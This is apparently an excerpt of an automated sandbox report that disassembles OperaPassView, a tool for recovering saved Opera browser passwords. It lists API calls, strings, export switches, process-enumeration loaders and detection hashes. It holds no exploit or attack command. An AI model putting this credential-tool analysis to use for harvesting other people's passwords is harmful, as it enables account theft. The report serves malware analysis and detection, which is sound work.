                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Window$Rect$ItemPointsText$Client$A570ExtentPoint32_snwprintfwcslen
                                        • String ID: %s:$EDIT$STATIC
                                        • API String ID: 842022892-3046471546
                                        • Opcode ID: 2b7329c89531e0cdded902813a7e1d204c2fb6548433e42077877b92fc7e4063
                                        • Instruction ID: 00c6174f09e9d85bfc0101fa71ec0abfc3127ee496ceb4a79d8969e95b1e413f
                                        • Opcode Fuzzy Hash: 2b7329c89531e0cdded902813a7e1d204c2fb6548433e42077877b92fc7e4063
                                        • Instruction Fuzzy Hash: 40B1D071108301AFD710DFA9C984E6BBBE9FF88704F004A2DF699962A1DB75E814CF16
                                        Function 00407ADB Relevance: 35.3, APIs: 16, Strings: 4, Instructions: 271windowregistryclipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00404CB2: LoadMenuW.USER32(00000000), ref: 00404CBA
                                        • SetMenu.USER32(?,00000000), ref: 00407C0A
                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00407C3D
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00407C4C
                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 00407C59
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00407C90
                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00407CB7
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,00000001), ref: 00407D31
                                        • LoadIconW.USER32(00000000,00000066), ref: 00407D3A
                                        • GetFileAttributesW.KERNEL32(004113D8,/nosaveload), ref: 00407DAB
                                        • GetTempPathW.KERNEL32(00000104,004113D8), ref: 00407DBB
                                        • wcslen.MSVCRT ref: 00407DC2
                                        • wcslen.MSVCRT ref: 00407DD0
                                        • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 00407E1D
                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 00407E56
                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 00407E69
                                        • DragAcceptFiles.SHELL32(?,00000001), ref: 00407E73
                                          • Part of subcall function 004023A5: wcslen.MSVCRT ref: 004023C2
                                          • Part of subcall function 004023A5: SendMessageW.USER32(00000000,00001061,00000000,?), ref: 004023E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: MessageSend$HandleLoadModulewcslen$Menu$AcceptAttributesClipboardCreateDragFileFilesFormatIconImagePathRegisterTempWindow
                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
                                        • API String ID: 2239506955-2103577948
                                        • Opcode ID: 0e5da505e621330b4a2d63a96c38446b6520448a779e9af2fe8d9db8e0b0c912
                                        • Instruction ID: 775989f50ab0ef32243f7c4ee976daec5aa22617c63f64fd310e10e69911fec0
                                        • Opcode Fuzzy Hash: 0e5da505e621330b4a2d63a96c38446b6520448a779e9af2fe8d9db8e0b0c912
                                        • Instruction Fuzzy Hash: BCB1D071904288EFEB11DF68C889BCE7FA5AF54300F044479FE48BB292C7B95544CBA9
                                        Function 0040ACEB Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscat$_snwprintfmemset$wcscpy
                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font$Dk@
                                        • API String ID: 3143752011-2104739131
                                        • Opcode ID: 05fe2a801be0b1613b89f7bc63cbac08c18fe65105dbcbdeac47736927c7b34a
                                        • Instruction ID: bf39317571149bd1c72c16801d1d72e1aa836a3e5b857ede7f61db198e60d93d
                                        • Opcode Fuzzy Hash: 05fe2a801be0b1613b89f7bc63cbac08c18fe65105dbcbdeac47736927c7b34a
                                        • Instruction Fuzzy Hash: 8A31E4B2800309AED720EA559D86E6F73BCDF40714F60497FF214B21C2EB3E99558A5E
                                        Function 004067EA Relevance: 31.7, APIs: 10, Strings: 8, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040680B
                                        • memset.MSVCRT ref: 00406835
                                        • memset.MSVCRT ref: 0040684B
                                        • memset.MSVCRT ref: 00406861
                                        • _snwprintf.MSVCRT ref: 0040689A
                                        • wcscpy.MSVCRT ref: 004068E5
                                        • _snwprintf.MSVCRT ref: 00406972
                                        • wcscat.MSVCRT ref: 004069A4
                                          • Part of subcall function 0040ABC0: _snwprintf.MSVCRT ref: 0040ABE4
                                        • wcscpy.MSVCRT ref: 00406986
                                        • _snwprintf.MSVCRT ref: 004069E3
                                          • Part of subcall function 00403992: wcslen.MSVCRT ref: 0040399F
                                          • Part of subcall function 00403992: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00406A3F,?,<item>), ref: 004039AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _snwprintfmemset$wcscpy$FileWritewcscatwcslen
                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s$Dk@
                                        • API String ID: 1277802453-447587558
                                        • Opcode ID: 9fb8add28beb6dedc95fe4ea4b1474876ec73735b2af5615a542e2dfb76c4588
                                        • Instruction ID: 3d811c55a601b9a54f9feaa86a49dc526349946696447936c9506965b807033a
                                        • Opcode Fuzzy Hash: 9fb8add28beb6dedc95fe4ea4b1474876ec73735b2af5615a542e2dfb76c4588
                                        • Instruction Fuzzy Hash: 4461BA71900208AFDF14EF54CC86EAE7B79EF04310F1044AAF915BA1E2DB79AA55CB49
                                        Function 0040B046 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 139COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(?,?,004054A2,?,00000000), ref: 0040B077
                                        • 74D41560.VERSION(00000000,0040D9A8,004054A2,?,004054A2,00000000,?,00000000,?,004054A2,?,00000000), ref: 0040B09A
                                        • 74D41560.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040D9A8,004054A2,?,004054A2,00000000,?,00000000,?,004054A2,?,00000000), ref: 0040B0D7
                                        • _snwprintf.MSVCRT ref: 0040B0F7
                                        • wcscpy.MSVCRT ref: 0040B121
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 0040B1D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: D41560$??2@??3@_snwprintfwcscpy
                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                        • API String ID: 457946229-1542517562
                                        • Opcode ID: 74b9f49adb43e93f1b4629508957e663a3cbe10271b0bc0781c0a43f198b81b9
                                        • Instruction ID: c77ba3d7781d57481aec87ede9c1e58c24b0b5df3c8ac5c2dbc8897c88521a13
                                        • Opcode Fuzzy Hash: 74b9f49adb43e93f1b4629508957e663a3cbe10271b0bc0781c0a43f198b81b9
                                        • Instruction Fuzzy Hash: 2E4121B2900219BAD704EBA5DC81DDEB7BCEF48304F104537B915F3181DB78AA658BE9
                                        Function 0040AE19 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 120COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _snwprintf$memset$wcscpy
                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                        • API String ID: 2000436516-3842416460
                                        • Opcode ID: 8d6898fab53ab0b60a390204c1e4cfbcaa00540991fd3ca177e4b9a86d2d2e9f
                                        • Instruction ID: ebae007158f5f2506bfea522e64c2bfb5fbc658421ecf67e2e85ebbb39a1aa2a
                                        • Opcode Fuzzy Hash: 8d6898fab53ab0b60a390204c1e4cfbcaa00540991fd3ca177e4b9a86d2d2e9f
                                        • Instruction Fuzzy Hash: 704142B194021DAAEB20EF55CC45FAB737CFF45304F4404B6B508B2191E7759B548BAA
                                        Function 0040542E Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 95COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00405454
                                        • memset.MSVCRT ref: 00405470
                                          • Part of subcall function 00403CE2: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040556D,00000000,00405420,?,00000000,00000208), ref: 00403CED
                                          • Part of subcall function 0040B046: ??2@YAPAXI@Z.MSVCRT(?,?,004054A2,?,00000000), ref: 0040B077
                                          • Part of subcall function 0040B046: 74D41560.VERSION(00000000,0040D9A8,004054A2,?,004054A2,00000000,?,00000000,?,004054A2,?,00000000), ref: 0040B09A
                                          • Part of subcall function 0040B046: 74D41560.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040D9A8,004054A2,?,004054A2,00000000,?,00000000,?,004054A2,?,00000000), ref: 0040B0D7
                                          • Part of subcall function 0040B046: _snwprintf.MSVCRT ref: 0040B0F7
                                          • Part of subcall function 0040B046: wcscpy.MSVCRT ref: 0040B121
                                        • wcscpy.MSVCRT ref: 004054B4
                                        • wcscpy.MSVCRT ref: 004054C3
                                        • wcscpy.MSVCRT ref: 004054D3
                                        • EnumResourceNamesW.KERNEL32(?,00000004,Function_00005202,00000000), ref: 00405538
                                        • EnumResourceNamesW.KERNEL32(?,00000005,Function_00005202,00000000), ref: 00405542
                                        • wcscpy.MSVCRT ref: 0040554A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscpy$D41560EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                        • String ID: RTL$Sb$TranslatorName$TranslatorURL$Version$general$strings$xA
                                        • API String ID: 4042976179-1320911777
                                        • Opcode ID: 0531f16f82f1763b03830d38b030f4b2bf235af16fc3c7ed929699e22dae36c4
                                        • Instruction ID: e640bb0d8affe5582c49cc3bbba19e5fe6b4909aa133fff550c0bb54b2d59f1c
                                        • Opcode Fuzzy Hash: 0531f16f82f1763b03830d38b030f4b2bf235af16fc3c7ed929699e22dae36c4
                                        • Instruction Fuzzy Hash: 0321B8B2D402187AD710B7A69C46ECB3A6CDF44758F500477B608720C2DBB95AC48AED
                                        Function 004087DF Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 184filewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetBkMode.GDI32(?,00000001), ref: 00408867
                                        • SetTextColor.GDI32(?,00FF0000), ref: 00408875
                                        • SelectObject.GDI32(?,?), ref: 0040888A
                                        • DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 004088BE
                                        • SelectObject.GDI32(00000014,00000005), ref: 004088CA
                                          • Part of subcall function 00408672: GetCursorPos.USER32(?), ref: 0040867F
                                          • Part of subcall function 00408672: GetSubMenu.USER32(?,00000000), ref: 0040868D
                                          • Part of subcall function 00408672: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 004086BB
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004088E5
                                        • LoadCursorW.USER32(00000000,00000067), ref: 004088EE
                                        • SetCursor.USER32(00000000), ref: 004088F5
                                        • PostMessageW.USER32(?,0000041C,00000000,00000000), ref: 0040891B
                                        • memset.MSVCRT ref: 00408958
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00408970
                                        • DragFinish.SHELL32(?), ref: 00408979
                                        • wcscpy.MSVCRT ref: 00408990
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Cursor$DragMenuObjectSelectText$ColorDrawFileFinishHandleLoadMessageModeModulePopupPostQueryTrackmemsetwcscpy
                                        • String ID: OperaPassView
                                        • API String ID: 1499467073-491582363
                                        • Opcode ID: e68aea664200f148d7cecb962a3098de5e09b77a34bd06c91c8b8d0c291bf007
                                        • Instruction ID: f4f63289b9d4773893809d9c1953786a0c93cdb49016a9501b264df7b69ccf3c
                                        • Opcode Fuzzy Hash: e68aea664200f148d7cecb962a3098de5e09b77a34bd06c91c8b8d0c291bf007
                                        • Instruction Fuzzy Hash: 4F519071600105EBDB14AF64CE89BAA77A5EF08350F10413BF545F66E1CB39AD11CF9A
                                        Function 00409BE7 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryW.KERNEL32(psapi.dll,?,004099CA), ref: 00409BFA
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00409C13
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00409C24
                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00409C35
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00409C46
                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00409C57
                                        • FreeLibrary.KERNEL32(00000000), ref: 00409C77
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$FreeLoad
                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll$t=h,@
                                        • API String ID: 2449869053-4046855281
                                        • Opcode ID: 31203c45b7668d9f2b8208e3f14b98e8e66298e6c3a09ffeb7be2b34e8d86659
                                        • Instruction ID: 2def95ee6364c46c4c3825ab0ca41f00cd5cc6740c1be7f79dca8be930f9057a
                                        • Opcode Fuzzy Hash: 31203c45b7668d9f2b8208e3f14b98e8e66298e6c3a09ffeb7be2b34e8d86659
                                        • Instruction Fuzzy Hash: FF01D830944205EEE7106B355F88FB73DE85B45B40B14403BEA85F22D5D7BC8842CABD
                                        Function 004071B8 Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004071FB
                                        • memset.MSVCRT ref: 00407210
                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407222
                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00407240
                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 0040727D
                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 004072B4
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004072CF
                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 004072E1
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004072EC
                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 004072FE
                                        • GetSysColor.USER32(0000000F), ref: 00407317
                                        • DeleteObject.GDI32(?), ref: 0040734E
                                        • DeleteObject.GDI32(?), ref: 00407354
                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00407371
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                        • String ID:
                                        • API String ID: 1010922700-0
                                        • Opcode ID: 4ae07d1eafb86ce8459b57e9f0386dc622c1cc60e412148285927fde4e3d20a8
                                        • Instruction ID: d0bb83a61ff01b1649836e0889e79c9a4213dc8e121548c6b09103e2141b6283
                                        • Opcode Fuzzy Hash: 4ae07d1eafb86ce8459b57e9f0386dc622c1cc60e412148285927fde4e3d20a8
                                        • Instruction Fuzzy Hash: 5E419571640304FFEB30AFA0CD8AF9777ADEB48B44F000929B799A51D1C6B66840DB69
                                        Function 00408BC0 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                        • API String ID: 2081463915-1959339147
                                        • Opcode ID: f126aac336027aade2bd992aa42c9a507d327af415dc3da46cb14e8707671f64
                                        • Instruction ID: 6a8d15b326756f270775eb0b4bc9ccd913514609a237ec2c8d7395a501cc2608
                                        • Opcode Fuzzy Hash: f126aac336027aade2bd992aa42c9a507d327af415dc3da46cb14e8707671f64
                                        • Instruction Fuzzy Hash: 1001007229971968F82821A72E07F830649CB91776F30187FF650F41C1FFED500090AD
                                        Function 00409B63 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,004099D1), ref: 00409B72
                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409B8B
                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409B9C
                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409BAD
                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409BBE
                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00409BCF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                        • API String ID: 667068680-3953557276
                                        • Opcode ID: d30f8cba2966ae3013e33a565664738dbb0437bd6f4c5981b50ab5659ddf17c1
                                        • Instruction ID: d5699f626ae312526b32aedc70a84687c167ea3aa57a85226076c8fac5791ee2
                                        • Opcode Fuzzy Hash: d30f8cba2966ae3013e33a565664738dbb0437bd6f4c5981b50ab5659ddf17c1
                                        • Instruction Fuzzy Hash: E3F06D70944316EAC7119B267D41F673AFD7644B94B14443BA904F62E4DBBCA8428A6C
                                        Function 00401FCD Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403992: wcslen.MSVCRT ref: 0040399F
                                          • Part of subcall function 00403992: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00406A3F,?,<item>), ref: 004039AE
                                        • memset.MSVCRT ref: 00402003
                                        • memset.MSVCRT ref: 00402018
                                        • memset.MSVCRT ref: 0040202D
                                        • _snwprintf.MSVCRT ref: 00402055
                                        • wcscpy.MSVCRT ref: 00402071
                                        • _snwprintf.MSVCRT ref: 004020B4
                                        Strings
                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00401FDD
                                        • OperaPassView, xrefs: 00402099
                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004020A7
                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00402048
                                        • <table dir="rtl"><tr><td>, xrefs: 0040206B
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$_snwprintf$FileWritewcscpywcslen
                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$OperaPassView
                                        • API String ID: 2731979376-2480273121
                                        • Opcode ID: 646dcd1b9e953231d9470da4bd5ea41191e2abfd72350d1d553057ad103d5c36
                                        • Instruction ID: 28fa50906486a289e45a5ad7195f249920ae2561e4a16ea69265e6305823cba7
                                        • Opcode Fuzzy Hash: 646dcd1b9e953231d9470da4bd5ea41191e2abfd72350d1d553057ad103d5c36
